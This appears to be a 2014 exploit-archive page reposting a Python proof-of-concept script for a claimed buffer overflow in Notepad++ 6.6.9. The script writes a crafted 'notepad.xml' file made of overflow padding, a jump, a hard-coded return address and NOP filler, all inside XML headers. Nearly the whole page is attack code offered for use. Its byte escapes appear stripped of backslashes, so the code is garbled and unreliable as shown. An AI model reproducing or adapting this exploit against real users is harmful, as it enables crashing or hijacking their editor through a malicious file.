Home / exploits NotePad++ 6.6.9 Buffer Overflow
Posted on 24 December 2014
#!/usr/bin/python # Exploit Title: NotePad++ v6.6.9 Buffer Overflow # URL Vendor: http://notepad-plus-plus.org/ # Vendor Name: NotePad # Version: 6.6.9 # Date: 22/12/2014 # CVE: CVE-2014-1004 # Author: TaurusOmar # Twitter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Risk: Medium #Description: #Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages. #Running in the MS Windows environment, its use is governed by GPL License. #Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed #and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon #dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment. #Proof Concept #http://i.imgur.com/TTDtxJM.jpg #Code import struct def little_endian(address): return struct.pack("<L",address) poc ="x41" * 591 poc+="xebx06x90x90" poc+=little_endian(0x1004C31F) poc+="x90" * 80 poc+="x90" * (20000 - len(poc)) header = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22" header += "x55x54x46x2dx38x22x20x3fx3ex0ax3cx53x63x68x65x64x75x6cx65x3ex0ax09x3cx45x76x65x6ex74x20x55" header += "x72x6cx3dx22x22x20x54x69x6dx65x3dx22x68x74x74x70x3ax2fx2fx0a" + poc footer = "x22x20x46x6fx6cx64x65x72x3dx22x22x20x2fx3ex0ax3cx2fx53x63x68x65x64x75x6cx65x3ex0a" exploit = header + footer filename = "notepad.xml" file = open(filename , "w") file.write(exploit) file.close()
